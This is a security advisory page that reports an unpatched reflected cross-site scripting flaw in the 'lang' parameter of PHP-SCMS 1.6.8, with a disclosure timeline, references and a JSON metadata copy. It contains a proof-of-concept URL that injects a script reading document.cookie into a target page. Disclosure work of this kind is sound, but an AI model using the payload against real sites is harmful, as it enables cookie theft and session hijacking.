Search...

PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability

2011-12-19T00:00:00

ID SECURITYVULNS:DOC:27458
Type securityvulns
Reporter Securityvulns
Modified 2011-12-19T00:00:00

Description

Advisory: PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability Advisory ID: SSCHADV2011-035 Author: Stefan Schurtz Affected Software: Successfully tested on PHP-SCMS 1.6.8 Vendor URL: http://php-scms.sourceforge.net/ Vendor Status: unpatched (no vendor feedback)

========================== Vulnerability Description ==========================

PHP-SCMS "lang" parameter is prone to a XSS vulnerability

================== PoC-Exploit ==================

http://<target>/scms/index.php?lang='"</script><script>alert(document.cookie)</script>

========= Solution =========

unpatched

==================== Disclosure Timeline ====================

08-Nov-2011 - Secunia SVCRP (vuln@secunia.com) 14-Dec-2011 - no vendor feedback 14-Dec-2011 - release date of this security advisory

======== Credits ========

Vulnerability found and advisory written by Stefan Schurtz.

=========== References ===========

http://secunia.com/advisories/46766/ http://www.rul3z.de/advisories/SSCHADV2011-035.txt

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:27458", "bulletinFamily": "software", "title": "PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability", "description": "Advisory: \tPHP-SCMS 1.6.8 "lang" parameter XSS vulnerability\r\nAdvisory ID: \tSSCHADV2011-035\r\nAuthor: \tStefan Schurtz\r\nAffected Software: Successfully tested on PHP-SCMS 1.6.8\r\nVendor URL: http://php-scms.sourceforge.net/\r\nVendor Status: unpatched (no vendor feedback)\r\n\r\n==========================\r\nVulnerability Description\r\n==========================\r\n\r\nPHP-SCMS "lang" parameter is prone to a XSS vulnerability\r\n\r\n==================\r\nPoC-Exploit\r\n==================\r\n\r\nhttp://<target>/scms/index.php?lang='"</script><script>alert(document.cookie)</script>\r\n\r\n=========\r\nSolution\r\n=========\r\n\r\nunpatched\r\n\r\n====================\r\nDisclosure Timeline\r\n====================\r\n\r\n08-Nov-2011 - Secunia SVCRP (vuln@secunia.com)\r\n14-Dec-2011 - no vendor feedback\r\n14-Dec-2011 - release date of this security advisory\r\n\r\n========\r\nCredits\r\n========\r\n\r\nVulnerability found and advisory written by Stefan Schurtz.\r\n\r\n===========\r\nReferences\r\n===========\r\n\r\nhttp://secunia.com/advisories/46766/\r\nhttp://www.rul3z.de/advisories/SSCHADV2011-035.txt\r\n", "published": "2011-12-19T00:00:00", "modified": "2011-12-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27458", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 34, "enchantments": {"score": {"value": 1.3, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12098"]}]}, "exploitation": null, "vulnersScore": 1.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

PHP-SCMS 1.6.8 &quot;lang&quot; parameter XSS vulnerability

Description

PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability